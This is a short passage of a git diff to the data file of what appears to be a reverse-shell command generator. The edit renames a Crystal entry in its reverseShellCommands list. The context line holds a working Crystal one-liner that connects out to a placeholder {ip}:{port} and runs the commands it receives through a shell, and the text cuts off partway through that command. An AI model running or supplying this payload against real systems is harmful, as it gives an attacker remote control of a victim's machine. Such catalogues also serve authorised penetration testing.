diff --git a/js/data.js b/js/data.js index 37b6560..40ae653 100644 --- a/js/data.js +++ b/js/data.js @@ -361,10 +361,15 @@ const reverseShellCommands = withCommandType( "meta": ["linux", "mac", "windows"] }, { - "name": "Crystal", + "name": "Crystal (system)", "command": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"{ip}\",{port});loop{m,l=c.receive;p=Process.new(m.rstrip(\"\\n\"),output:Process::Redirect::Pipe,shell:true);c<